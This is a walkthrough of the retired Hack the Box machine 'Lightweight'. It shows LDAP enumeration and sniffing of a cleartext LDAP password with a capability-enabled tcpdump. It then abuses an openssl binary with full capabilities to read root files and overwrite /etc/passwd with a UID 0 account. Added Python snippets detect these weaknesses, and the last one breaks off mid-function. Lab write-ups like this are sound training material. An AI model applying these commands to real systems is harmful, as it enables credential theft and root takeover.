Today we are going to solve another CTF challenge, “Lightweight”. It is a retired vulnerable lab from Hack the Box, which helps pentesters practise online penetration testing at their own experience level; they offer a collection of vulnerable labs as challenges, from beginner to expert level.
Level: Medium
Task: To find user.txt and root.txt file
Note: Since these labs are available online, they have a static IP. The IP of Lightweight is 10.10.10.119.
Let’s start off with our basic Nmap command to find out the open ports and services.
nmap -sV -sT -sC lightweight.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-06 02:55 EDT
Stats: 0:00:14 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 13.55% done; ETC: 02:57 (0:01:23 remaining)
Nmap scan report for lightweight.htb (10.10.10.119)
Host is up (0.54s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 19:97:59:9a:15:fd:d2:ac:bd:84:73:c4:29:e9:2b:73 (RSA)
|   256 88:58:a1:cf:38:cd:2e:15:1d:2c:7f:72:06:a3:57:67 (ECDSA)
|_  256 31:6c:c1:eb:3b:28:0f:ad:d5:79:72:8f:f5:b5:49:db (ED25519)
80/tcp  open  http    Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16)
|_http-title: Lightweight slider evaluation page - slendr
389/tcp open  ldap    OpenLDAP 2.2.X - 2.3.X
| ssl-cert: Subject: commonName=lightweight.htb
| Subject Alternative Name: DNS:lightweight.htb, DNS:localhost, DNS:localhost.localdomain
| Not valid before: 2018-06-09T13:32:51
|_Not valid after:  2019-06-09T13:32:51
|_ssl-date: TLS randomness does not represent time
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 80.51 seconds
Since LDAP is exposed on port 389, we use the nmap ldap-search NSE script for LDAP enumeration:
root@kali:~/htb/lightweight# nmap -Pn -p 389 --script ldap-search 10.10.10.119
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-06 02:57 EDT
Nmap scan report for lightweight.htb (10.10.10.119)
Host is up (0.026s latency).
PORT    STATE SERVICE
389/tcp open  ldap
| ldap-search:
|   Context: dc=lightweight,dc=htb
|     dn: dc=lightweight,dc=htb
|         objectClass: top
|         objectClass: dcObject
|         objectClass: organization
|         o: lightweight htb
|         dc: lightweight
|     dn: cn=Manager,dc=lightweight,dc=htb
|         objectClass: organizationalRole
|         cn: Manager
|         description: Directory Manager
|     dn: ou=People,dc=lightweight,dc=htb
|         objectClass: organizationalUnit
|         ou: People
|     dn: ou=Group,dc=lightweight,dc=htb
|         objectClass: organizationalUnit
|         ou: Group
|     dn: uid=ldapuser1,ou=People,dc=lightweight,dc=htb
|         uid: ldapuser1
|         cn: ldapuser1
|         sn: ldapuser1
|         mail: ldapuser1@lightweight.htb
|         objectClass: person
|         objectClass: organizationalPerson
|         objectClass: inetOrgPerson
|         objectClass: posixAccount
|         objectClass: top
|         objectClass: shadowAccount
|         userPassword: {crypt}$6$3qx0SD9x$Q9y1lyQaFKpxqkGqKAjLOWd33Nwdhj.l4MzV7vTnfkE/g/Z/7N5ZbdEQWfup2lSdASImHtQFh6zMo41ZA./44/
|         shadowLastChange: 17691
|         shadowMin: 0
|         shadowMax: 99999
|         shadowWarning: 7
|         loginShell: /bin/bash
|         uidNumber: 1000
|         gidNumber: 1000
|         homeDirectory: /home/ldapuser1
|     dn: uid=ldapuser2,ou=People,dc=lightweight,dc=htb
|         uid: ldapuser2
|         cn: ldapuser2
|         sn: ldapuser2
|         mail: ldapuser2@lightweight.htb
|         objectClass: person
|         objectClass: organizationalPerson
|         objectClass: inetOrgPerson
|         objectClass: posixAccount
|         objectClass: top
|         objectClass: shadowAccount
|         userPassword: {crypt}$6$xJxPjT0M$1m8kM00CJYCAgzT4qz8TQwyGFQvk3boaymuAmMZCOfm3OA7OKunLZZlqytUp2dun509OBE2xwX/QEfjdRQzgn1
|         shadowLastChange: 17691
|         shadowMin: 0
|         shadowMax: 99999
|         shadowWarning: 7
|         loginShell: /bin/bash
|         uidNumber: 1001
|         gidNumber: 1001
|         homeDirectory: /home/ldapuser2
|     dn: cn=ldapuser1,ou=Group,dc=lightweight,dc=htb
|         objectClass: posixGroup
|         objectClass: top
|         cn: ldapuser1
|         userPassword: {crypt}x
|         gidNumber: 1000
|     dn: cn=ldapuser2,ou=Group,dc=lightweight,dc=htb
|         objectClass: posixGroup
|         objectClass: top
|         cn: ldapuser2
|         userPassword: {crypt}x
|_        gidNumber: 1001
Nmap done: 1 IP address (1 host up) scanned in 0.92 seconds
Since we know the HTTP service is running on port 80, we browse to the target IP in a web browser and are welcomed by the following page, where we saw “This site is protected against brute forcing”. That means fail2ban could be running inside the VM. Moreover, we found three hyperlinks.
When I opened the user.php hyperlink, I read the highlighted text; according to it, a user has been automatically added on the machine for us.
Exploiting
Therefore, I tried to connect over SSH using 10.10.14.10:10.10.14.10 as the login credentials. At this point I was not sure what should be done to extract the hidden flag, so I thought to identify binaries with file capabilities with the help of getcap, and saw a fruitful result.
root@kali:~/htb# ssh 10.10.14.7@lightweight.htb
10.10.14.7@lightweight.htb's password:10.10.14.7
[10.10.14.7@lightweight ~]$ id
uid=1003(10.10.14.7) gid=1003(10.10.14.7) groups=1003(10.10.14.7) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[10.10.14.7@lightweight ~]$ getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_admin,cap_net_raw+p
/usr/sbin/mtr = cap_net_raw+ep
/usr/sbin/suexec = cap_setgid,cap_setuid+ep
/usr/sbin/arping = cap_net_raw+p
/usr/sbin/clockdiff = cap_net_raw+p
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+ep
tcpdump -i any -X port ldap
Because /usr/sbin/tcpdump carries cap_net_admin,cap_net_raw+ep, an unprivileged user can run it and capture traffic. As a result, we observe the following traffic, as predicted, in which I found the ldapuser2 password in plaintext.
[10.10.14.7@lightweight ~]$ tcpdump -i any -X port ldap
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on any, link-type LINUX_SLL (Linux cooked), capture size 262144 bytes
08:04:48.987956 IP lightweight.htb.59646 > lightweight.htb.ldap: Flags [S], seq 4215069383, win 43690, options [mss 65495,sackOK,TS val 372966 ecr 0,nop,wscale 6], length 0
0x0000: 4500 003c 6a21 4000 4006 a799 0a0a 0a77 E..<j!@.@......w
0x0010: 0a0a 0a77 e8fe 0185 fb3c dac7 0000 0000 ...w.....<......
0x0020: a002 aaaa 2930 0000 0204 ffd7 0402 080a ....)0..........
0x0030: 0005 b0e6 0000 0000 0103 0306 0000 0000 ................
0x0040: 0000 0000 0000 0000 0000 0000 ............
08:04:48.987983 IP lightweight.htb.ldap > lightweight.htb.59646: Flags [S.], seq 3703358360, ack 4215069384, win 43690, options [mss 65495,sackOK,TS val 372966 ecr 372966,nop,wscale 6], length 0
0x0000: 4500 003c 0000 4000 4006 11bb 0a0a 0a77 E..<..@.@......w
0x0010: 0a0a 0a77 0185 e8fe dcbc c398 fb3c dac8 ...w.........<..
0x0020: a012 aaaa 2930 0000 0204 ffd7 0402 080a ....)0..........
0x0030: 0005 b0e6 0005 b0e6 0103 0306 0000 0000 ................
0x0040: 0000 0000 0000 0000 0000 0000 ............
08:04:48.988003 IP lightweight.htb.59646 > lightweight.htb.ldap: Flags [.], ack 1, win 683, options [nop,nop,TS val 372966 ecr 372966], length 0
0x0000: 4500 0034 6a22 4000 4006 a7a0 0a0a 0a77 E..4j"@.@......w
0x0010: 0a0a 0a77 e8fe 0185 fb3c dac8 dcbc c399 ...w.....<......
0x0020: 8010 02ab 2928 0000 0101 080a 0005 b0e6 ....)(..........
0x0030: 0005 b0e6 0000 0000 0000 0000 0000 0000 ................
0x0040: 0000 0000 ....
08:04:48.988062 IP lightweight.htb.59646 > lightweight.htb.ldap: Flags [P.], seq 1:92, ack 1, win 683, options [nop,nop,TS val 372966 ecr 372966], length 91
0x0000: 4500 008f 6a23 4000 4006 a744 0a0a 0a77 E...j#@.@..D...w
0x0010: 0a0a 0a77 e8fe 0185 fb3c dac8 dcbc c399 ...w.....<......
0x0020: 8018 02ab 2983 0000 0101 080a 0005 b0e6 ....)...........
0x0030: 0005 b0e6 3059 0201 0160 5402 0103 042d ....0Y...`T....-
0x0040: 7569 643d 6c64 6170 7573 6572 322c 6f75 uid=ldapuser2,ou
0x0050: 3d50 656f 706c 652c 6463 3d6c 6967 6874 =People,dc=light
0x0060: 7765 6967 6874 2c64 633d 6874 6280 2038 weight,dc=htb..8
0x0070: 6263 3832 3531 3333 3261 6265 3164 3766 bc8251332abe1d7f
0x0080: 3130 3564 3365 3533 6164 3339 6163 3200 105d3e53ad39ac2.
0x0090: 0000 0000 0000 0000 0000 0000 0000 00 ...............
08:04:48.988069 IP lightweight.htb.ldap > lightweight.htb.59646: Flags [.], ack 92, win 683, options [nop,nop,TS val 372966 ecr 372966], length 0
0x0000: 4500 0034 737f 4000 4006 9e43 0a0a 0a77 E..4s.@.@..C...w
0x0010: 0a0a 0a77 0185 e8fe dcbc c399 fb3c db23 ...w.........<.#
0x0020: 8010 02ab 2928 0000 0101 080a 0005 b0e6 ....)(..........
0x0030: 0005 b0e6 0000 0000 0000 0000 0000 0000 ................
0x0040: 0000 0000 ....
08:04:48.997887 IP lightweight.htb.ldap > lightweight.htb.59646: Flags [P.], seq 1:15, ack 92, win 683, options [nop,nop,TS val 372976 ecr 372966], length 14
0x0000: 4500 0042 7380 4000 4006 9e34 0a0a 0a77 E..Bs.@.@..4...w
0x0010: 0a0a 0a77 0185 e8fe dcbc c399 fb3c db23 ...w.........<.#
0x0020: 8018 02ab 2936 0000 0101 080a 0005 b0f0 ....)6..........
0x0030: 0005 b0e6 300c 0201 0161 070a 0100 0400 ....0....a......
0x0040: 0400 0000 0000 0000 0000 0000 0000 0000 ................
0x0050: 0000 ..
08:04:48.997899 IP lightweight.htb.59646 > lightweight.htb.ldap: Flags [.], ack 15, win 683, options [nop,nop,TS val 372976 ecr 372976], length 0
0x0000: 4500 0034 6a24 4000 4006 a79e 0a0a 0a77 E..4j$@.@......w
0x0010: 0a0a 0a77 e8fe 0185 fb3c db23 dcbc c3a7 ...w.....<.#....
0x0020: 8010 02ab 2928 0000 0101 080a 0005 b0f0 ....)(..........
0x0030: 0005 b0f0 0000 0000 0000 0000 0000 0000 ................
0x0040: 0000 0000 ....
08:04:49.001674 IP lightweight.htb.59646 > lightweight.htb.ldap: Flags [P.], seq 92:99, ack 15, win 683, options [nop,nop,TS val 372980 ecr 372976], length 7
0x0000: 4500 003b 6a25 4000 4006 a796 0a0a 0a77 E..;j%@.@......w
0x0010: 0a0a 0a77 e8fe 0185 fb3c db23 dcbc c3a7 ...w.....<.#....
0x0020: 8018 02ab 292f 0000 0101 080a 0005 b0f4 ....)/..........
0x0030: 0005 b0f0 3005 0201 0242 0006 0000 0000 ....0....B......
0x0040: 0000 0000 0000 0000 0000 00 ...........
^C
8 packets captured
44 packets received by filter
28 packets dropped by kernel
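The capture above shows why this works: the web application authenticates to the local LDAP server with a simple bind over plain TCP on port 389, so the DN and password travel in the clear and anyone who can sniff the interface recovers them. As an added illustration (this is not code from the original walkthrough), the following Python decodes the two LDAP packets from the dump above. The hex dumps are copied from the page; the parsing is generic: rebuild the IPv4 datagram from `tcpdump -X` lines, strip the IP and TCP headers, then walk the BER encoding of LDAPMessage (RFC 4511). The `cleartext_bind_alert` function is the kind of rule a sensor on port 389 would apply: log the bind DN and flag the cleartext credential without recording the secret itself.

```python
"""Decode the cleartext LDAP simple bind captured above from `tcpdump -X` output.

Added example, not code from the original walkthrough. The two hex dumps are
the BindRequest and BindResponse packets copied from the capture on this page.
The decoding is generic: reassemble the IPv4 datagram, skip the IP and TCP
headers, then walk the BER encoding of LDAPMessage (RFC 4511, section 4.2).
"""

# Packet 4 of the capture: the web application's BindRequest (copied from the page).
BIND_REQUEST_DUMP = """\
0x0000: 4500 008f 6a23 4000 4006 a744 0a0a 0a77 E...j#@.@..D...w
0x0010: 0a0a 0a77 e8fe 0185 fb3c dac8 dcbc c399 ...w.....<......
0x0020: 8018 02ab 2983 0000 0101 080a 0005 b0e6 ....)...........
0x0030: 0005 b0e6 3059 0201 0160 5402 0103 042d ....0Y...`T....-
0x0040: 7569 643d 6c64 6170 7573 6572 322c 6f75 uid=ldapuser2,ou
0x0050: 3d50 656f 706c 652c 6463 3d6c 6967 6874 =People,dc=light
0x0060: 7765 6967 6874 2c64 633d 6874 6280 2038 weight,dc=htb..8
0x0070: 6263 3832 3531 3333 3261 6265 3164 3766 bc8251332abe1d7f
0x0080: 3130 3564 3365 3533 6164 3339 6163 3200 105d3e53ad39ac2.
0x0090: 0000 0000 0000 0000 0000 0000 0000 00 ...............
"""

# Packet 6 of the capture: the server's BindResponse (copied from the page).
BIND_RESPONSE_DUMP = """\
0x0000: 4500 0042 7380 4000 4006 9e34 0a0a 0a77 E..Bs.@.@..4...w
0x0010: 0a0a 0a77 0185 e8fe dcbc c399 fb3c db23 ...w.........<.#
0x0020: 8018 02ab 2936 0000 0101 080a 0005 b0f0 ....)6..........
0x0030: 0005 b0e6 300c 0201 0161 070a 0100 0400 ....0....a......
0x0040: 0400 0000 0000 0000 0000 0000 0000 0000 ................
0x0050: 0000 ..
"""


def parse_tcpdump_hex(dump):
    """Rebuild one IPv4 datagram from `tcpdump -X` lines (no link-layer header)."""
    data = bytearray()
    total = None
    for line in dump.splitlines():
        line = line.strip()
        if not line.startswith("0x"):
            continue
        offset_str, rest = line.split(":", 1)
        tokens = rest.split()
        if total is None:
            # IPv4 total length lives in bytes 2-3 of the first line.
            total = int.from_bytes(bytes.fromhex(tokens[0] + tokens[1])[2:4], "big")
        remaining = total - int(offset_str, 16)
        if remaining <= 0:
            break                      # the rest of the dump is capture padding
        # Each group is two bytes; take only as many as the datagram still needs,
        # which keeps the ASCII column on the right from being misread as hex.
        ngroups = (min(16, remaining) + 1) // 2
        data += bytes.fromhex("".join(tokens[:ngroups]))
    return bytes(data[:total])


def tcp_payload(datagram):
    """Strip the IPv4 header (IHL) and the TCP header (data offset)."""
    ihl = (datagram[0] & 0x0F) * 4
    data_offset = (datagram[ihl + 12] >> 4) * 4
    return datagram[ihl + data_offset:]


def ber_read(buf, pos):
    """Read one BER TLV at pos; return (tag, value, position after it)."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                  # long form: low 7 bits = number of length bytes
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def parse_ldap_message(payload):
    """Decode an LDAPMessage; understands BindRequest and BindResponse."""
    tag, msg, _ = ber_read(payload, 0)
    if tag != 0x30:
        raise ValueError("not an LDAPMessage SEQUENCE")
    _, mid, pos = ber_read(msg, 0)
    op_tag, op, _ = ber_read(msg, pos)
    out = {"message_id": int.from_bytes(mid, "big")}
    if op_tag == 0x60:                 # BindRequest [APPLICATION 0]
        _, ver, pos = ber_read(op, 0)
        _, name, pos = ber_read(op, pos)
        auth_tag, auth, _ = ber_read(op, pos)
        out.update(op="BindRequest", version=int.from_bytes(ver, "big"), name=name.decode())
        # [0] simple = password in the clear; [3] would be a SASL exchange.
        out["password"] = auth.decode() if auth_tag == 0x80 else None
    elif op_tag == 0x61:               # BindResponse [APPLICATION 1]
        _, code, _ = ber_read(op, 0)   # resultCode ENUMERATED, 0 = success
        out.update(op="BindResponse", result_code=int.from_bytes(code, "big"))
    else:
        out["op"] = f"protocolOp tag 0x{op_tag:02x}"
    return out


def cleartext_bind_alert(dump):
    """What a sensor on port 389 should log: the bind DN, never the secret itself."""
    msg = parse_ldap_message(tcp_payload(parse_tcpdump_hex(dump)))
    if msg.get("op") == "BindRequest" and msg.get("password") is not None:
        return (f"ALERT cleartext LDAP simple bind: dn={msg['name']} "
                f"password_len={len(msg['password'])}")
    return None


if __name__ == "__main__":
    print(cleartext_bind_alert(BIND_REQUEST_DUMP))
    print(parse_ldap_message(tcp_payload(parse_tcpdump_hex(BIND_RESPONSE_DUMP))))
```

The BindResponse decodes to resultCode 0 (success), so the sniffed credential is known to be valid at the moment it is captured. The fix on the server side is to refuse simple binds without confidentiality (LDAPS or StartTLS, or the ldapi:// Unix socket for a local web application) and to alert on any that still arrive on a plain 389 socket.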
Then we switch user with the following credentials and obtain our first flag, user.txt:
Username: ldapuser2 Password: 8bc8251332abe1d7f105d3e53ad39ac2
[10.10.14.7@lightweight ~]$ su ldapuser2
Password: 8bc8251332abe1d7f105d3e53ad39ac2
[ldapuser2@lightweight 10.10.14.7]$ pwd
/home/10.10.14.7
[ldapuser2@lightweight 10.10.14.7]$ cd ..
[ldapuser2@lightweight home]$ ls
10.10.14.2  10.10.14.7  ldapuser1  ldapuser2
[ldapuser2@lightweight home]$ cd ldapuser2
[ldapuser2@lightweight ~]$ ls
backup.7z  OpenLDAP-Admin-Guide.pdf  OpenLdap.pdf  user.txt
[ldapuser2@lightweight ~]$ cat user.txt
8a866d3bb7e13a57aaeb110297f48026
Privilege Escalation
Inside the ldapuser2 directory, I found an archive, backup.7z, and to inspect it we need to transfer the file to our local machine.
[ldapuser2@lightweight ~]$ cat backup.7z | base64
N3q8ryccAAQmbxM1EA0AAAAAAAAjAAAAAAAAAI5s6D0e1KZKLpqLx2xZ2BYNO8O7/Zlc4Cz0MOpB
lJ/010X2vz7SOOnwbpjaNEbdpT3wq/EZAoUuSypOMuCw8Sszr0DTUbIUDWJm2xo9ZuHIL6nVFlVu
--snip--
3sgjI
hYusiF1vL3ojt9qcVa4mCjTpus4e3vJ4gd6iWAt8KT2GmnPjb0+N+tYjcX9U/W/leRKQGX/USF7X
WwZioJpI7t/uAAAAABcGjFABCYDAAAcLAQABIwMBAQVdABAAAAyBCgoBPiBwEwAA
So I copied it to our machine and tried to extract the archive, but it was password protected.
I used the following to crack the archive password:
Then I used the recovered password “delete” to extract the archive. It contained some PHP files, and among them we looked for status.php.
root@kali:~/htb/lightweight# 7z e backup.7z

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs Intel(R) Pentium(R) CPU 4415U @ 2.30GHz (806E9),ASM,AES-NI)

Scanning the drive for archives:
1 file, 3411 bytes (4 KiB)

Extracting archive: backup.7z
--
Path = backup.7z
Type = 7z
Physical Size = 3411
Headers Size = 259
Method = LZMA2:12k 7zAES
Solid = +
Blocks = 1

Enter password (will not be echoed):
Everything is Ok

Files: 5
Size:       10270
Compressed: 3411
root@kali:~/htb/lightweight# ls
backup.7z  backup.7z.b64  index.php  info.php  reset.php  status.php  user.php
The status.php file reveals the password of ldapuser1 as shown below.
root@kali:~/htb/lightweight# cat status.php | grep user
$username = 'ldapuser1';
//$ldapconfig['usersdn'] = 'cn=users';
$dn="uid=ldapuser1,ou=People,dc=lightweight,dc=htb";
<p><br><br><a href="index.php">home</a> <a href="info.php">info</a> <a href="status.php">status</a> <a href="user.php">user</a></p>
root@kali:~/htb/lightweight# cat status.php | grep password
$password = 'f3ca9d298a553da117442deeb6fa932d';
if ($bind=ldap_bind($ds, $dn, $password)) {
Thus, we switch to ldapuser1 and navigate into that user's home directory:
[ldapuser2@lightweight ~]$ su ldapuser1
Password: f3ca9d298a553da117442deeb6fa932d
[ldapuser1@lightweight ldapuser2]$ pwd
/home/ldapuser2
[ldapuser1@lightweight /]$ cd /home/ldapuser1
[ldapuser1@lightweight ~]$ ls -la
total 1496
drwx------. 4 ldapuser1 ldapuser1    181 Jun 15  2018 .
drwxr-xr-x. 6 root      root          76 Sep  6 07:57 ..
-rw-------. 1 ldapuser1 ldapuser1      0 Jun 21  2018 .bash_history
-rw-r--r--. 1 ldapuser1 ldapuser1     18 Apr 11  2018 .bash_logout
-rw-r--r--. 1 ldapuser1 ldapuser1    193 Apr 11  2018 .bash_profile
-rw-r--r--. 1 ldapuser1 ldapuser1    246 Jun 15  2018 .bashrc
drwxrwxr-x. 3 ldapuser1 ldapuser1     18 Jun 11  2018 .cache
-rw-rw-r--. 1 ldapuser1 ldapuser1   9714 Jun 15  2018 capture.pcap
drwxrwxr-x. 3 ldapuser1 ldapuser1     18 Jun 11  2018 .config
-rw-rw-r--. 1 ldapuser1 ldapuser1    646 Jun 15  2018 ldapTLS.php
-rwxr-xr-x. 1 ldapuser1 ldapuser1 555296 Jun 13  2018 openssl
-rwxr-xr-x. 1 ldapuser1 ldapuser1 942304 Jun 13  2018 tcpdump
[ldapuser1@lightweight ~]$ getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_admin,cap_net_raw+p
/usr/sbin/mtr = cap_net_raw+ep
/usr/sbin/suexec = cap_setgid,cap_setuid+ep
/usr/sbin/arping = cap_net_raw+p
/usr/sbin/clockdiff = cap_net_raw+p
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+ep
/home/ldapuser1/tcpdump = cap_net_admin,cap_net_raw+ep
/home/ldapuser1/openssl =ep
[ldapuser1@lightweight ~]$ ./openssl base64 -a -in /root/root.txt | base64 -d
f1d4e309c5a6b3fffff74a8f4b2135fa
This time I once again checked for file capabilities and saw that the openssl copy in ldapuser1's home directory has the full capability set (=ep), so it can read any file owned by root; therefore we decided to grab root.txt directly through OpenSSL.
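Both getcap listings in this walkthrough (the first as the 10.10.14.7 user, the second as ldapuser1) are exactly what a host audit should be reading. As an added example (not code from the original walkthrough), the following Python parses `getcap -r /` output and grades each file: a bare `=ep` with no capability names means every capability is in the effective and permitted sets, `+ep` on a sniffer means any local user can capture traffic, `+p` alone is only permitted (the program has to raise it itself), and a capability-bearing binary under a home directory is not something a package manager installed. The sample input is the listing printed above; the parser also accepts the newer `path caps=flags` style that recent libcap prints.

```python
"""Audit `getcap -r /` output for file capabilities that break least privilege.

Added example; not code from the original walkthrough. GETCAP_OUTPUT is the
listing printed above (old libcap "path = caps+flags" style); the parser also
accepts the newer "path caps=flags" style. A bare "=ep" with no capability
names means every capability is in the effective and permitted sets, which is
what makes the openssl copy in ldapuser1's home root-equivalent.
"""
import re

GETCAP_OUTPUT = """\
/usr/bin/ping = cap_net_admin,cap_net_raw+p
/usr/sbin/mtr = cap_net_raw+ep
/usr/sbin/suexec = cap_setgid,cap_setuid+ep
/usr/sbin/arping = cap_net_raw+p
/usr/sbin/clockdiff = cap_net_raw+p
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+ep
/home/ldapuser1/tcpdump = cap_net_admin,cap_net_raw+ep
/home/ldapuser1/openssl =ep
"""

# Capabilities that let a general-purpose program act as root outright.
ROOT_EQUIVALENT = {"cap_setuid", "cap_setgid", "cap_sys_admin", "cap_dac_override",
                   "cap_dac_read_search", "cap_sys_ptrace", "cap_sys_module",
                   "cap_chown", "cap_fowner", "cap_sys_rawio"}
# Capabilities that let an unprivileged user capture traffic (the tcpdump case above).
SNIFF = {"cap_net_raw", "cap_net_admin"}
SYSTEM_DIRS = ("/usr/bin/", "/usr/sbin/", "/bin/", "/sbin/", "/usr/lib/", "/usr/libexec/")
SEVERITY = ["INFO", "LOW", "MEDIUM", "HIGH", "CRITICAL"]

# "path = caps+flags" (old libcap) or "path caps=flags" (newer libcap).
LINE_RE = re.compile(r"^(?P<path>\S+)\s*=?\s*(?P<caps>[a-z_0-9,]*)(?P<op>[+=])(?P<flags>[eip]*)$")


def parse_getcap_line(line):
    """Return (path, set of named caps, all_caps flag, set of e/i/p flags)."""
    m = LINE_RE.match(line.strip())
    if not m:
        raise ValueError(f"unrecognised getcap line: {line!r}")
    caps = set(filter(None, m["caps"].split(",")))
    all_caps = m["op"] == "=" and not caps      # "=ep": the whole capability set
    return m["path"], caps, all_caps, set(m["flags"])


def audit_getcap(text):
    """Classify each capability-bearing file; returns (path, severity, reason) tuples."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        path, caps, all_caps, flags = parse_getcap_line(line)
        if all_caps:
            sev, why = "CRITICAL", "full capability set (root-equivalent)"
        elif caps & ROOT_EQUIVALENT:
            sev, why = "HIGH", "root-equivalent capability: " + ",".join(sorted(caps & ROOT_EQUIVALENT))
        elif caps & SNIFF and "e" in flags:
            sev, why = "MEDIUM", "effective at exec: any user can capture traffic"
        elif caps & SNIFF:
            sev, why = "LOW", "permitted only: program must raise the capability itself"
        else:
            sev, why = "INFO", "other capability"
        if not path.startswith(SYSTEM_DIRS):
            # A capability-bearing binary in a home or temp directory is not
            # something package management installs; treat it as a persistence indicator.
            sev = max(sev, "HIGH", key=SEVERITY.index)
            why += "; file outside system binary directories"
        findings.append((path, sev, why))
    return sorted(findings, key=lambda f: -SEVERITY.index(f[1]))


if __name__ == "__main__":
    for path, sev, why in audit_getcap(GETCAP_OUTPUT):
        print(f"{sev:8} {path}: {why}")
```

Run against the listing above, the two files in /home/ldapuser1 come out on top: openssl as CRITICAL for the full set, tcpdump as HIGH because a sniffer with `+ep` is sitting outside the system directories. Remediation is `setcap -r` on the stray copies and a periodic comparison of `getcap -r /` against a known-good baseline.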
We can also get a root shell by overwriting /etc/passwd. I got a copy of the original passwd file first:
[ldapuser1@lightweight ~]$ ./openssl enc -base64 -in /etc/passwd -out ./passwd.b64
First we create a salted MD5-crypt password hash for the new account (salt toor1, password foo). The command used is:
root@kali:~/htb# openssl passwd -1 -salt toor1 foo
$1$toor1$ul/jFevbTiCURU7.RJaPs.
[ldapuser1@lightweight ~]$ base64 -d passwd.b64 > passwd
[ldapuser1@lightweight ~]$ echo "toor1:aaKNIEDOaueR6:0:0:toor:/root:/bin/bash" >> passwd
[ldapuser1@lightweight ~]$ cat passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
--snip--
tcpdump:x:72:72::/:/sbin/nologin
ldap:x:55:55:OpenLDAP server:/var/lib/ldap:/sbin/nologin
saslauth:x:996:76:Saslauthd user:/run/saslauthd:/sbin/nologin
ldapuser1:x:1000:1000::/home/ldapuser1:/bin/bash
ldapuser2:x:1001:1001::/home/ldapuser2:/bin/bash
10.10.14.2:x:1002:1002::/home/10.10.14.2:/bin/bash
10.10.14.7:x:1003:1003::/home/10.10.14.7:/bin/bash
toor1:aaKNIEDOaueR6:0:0:toor:/root:/bin/bash
[ldapuser1@lightweight ~]$ ./openssl enc -in passwd -out /etc/passwd
[ldapuser1@lightweight ~]$ su toor1
Password: foo
[root@lightweight ldapuser1]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[root@lightweight ldapuser1]# hostnamectl
   Static hostname: lightweight.htb
         Icon name: computer-vm
           Chassis: vm
        Machine ID: 5c4e4aeb65784243992e15ac56ed6b3d
           Boot ID: d6332c6cc8834f9980faf65efa1a6513
    Virtualization: vmware
  Operating System: CentOS Linux 7 (Core)
       CPE OS Name: cpe:/o:centos:centos:7
            Kernel: Linux 3.10.0-862.3.3.el7.x86_64
      Architecture: x86-64
[root@lightweight ldapuser1]#
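The passwd overwrite above leaves two things a defender can check for without any baseline at all: a second account with UID 0, and a password hash sitting in /etc/passwd instead of /etc/shadow. As an added example (not code from the original walkthrough), the following Python parses passwd(5) content, reports both patterns, and shows the baseline comparison a file-integrity monitor would make. PASSWD_AFTER is the file as printed above with the toor1 line appended (the snipped entries are omitted); PASSWD_BEFORE is the same content without that last line.

```python
"""Spot a tampered /etc/passwd: extra UID 0 accounts and hashes outside /etc/shadow.

Added example; not part of the original walkthrough. PASSWD_AFTER is the file
as printed above once the toor1 line was appended (the snipped entries are
omitted), and PASSWD_BEFORE is the same content without that last line, so the
two stand in for a file-integrity baseline and the current file.
"""
import hashlib

PASSWD_AFTER = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
ldap:x:55:55:OpenLDAP server:/var/lib/ldap:/sbin/nologin
saslauth:x:996:76:Saslauthd user:/run/saslauthd:/sbin/nologin
ldapuser1:x:1000:1000::/home/ldapuser1:/bin/bash
ldapuser2:x:1001:1001::/home/ldapuser2:/bin/bash
10.10.14.2:x:1002:1002::/home/10.10.14.2:/bin/bash
10.10.14.7:x:1003:1003::/home/10.10.14.7:/bin/bash
toor1:aaKNIEDOaueR6:0:0:toor:/root:/bin/bash
"""
PASSWD_BEFORE = "".join(PASSWD_AFTER.splitlines(keepends=True)[:-1])

# Values of the password field that do NOT carry a hash: shadowed or locked.
NON_HASH = {"x", "*", "!", "!!"}
FIELDS = ("name", "pw", "uid", "gid", "gecos", "home", "shell")


def parse_passwd(text):
    """Parse passwd(5) lines into dicts with numeric uid/gid."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        entry = dict(zip(FIELDS, fields))
        entry["uid"], entry["gid"] = int(entry["uid"]), int(entry["gid"])
        entries.append(entry)
    return entries


def audit_passwd(entries):
    """Return (account, reason) findings for the classic passwd-tampering patterns."""
    findings = []
    seen = set()
    for e in entries:
        if e["uid"] == 0 and e["name"] != "root":
            findings.append((e["name"], "extra UID 0 account"))
        if e["pw"] == "":
            findings.append((e["name"], "empty password field (no password required)"))
        elif e["pw"] not in NON_HASH:
            findings.append((e["name"], "password hash stored in /etc/passwd (bypasses /etc/shadow)"))
        if e["name"] in seen:
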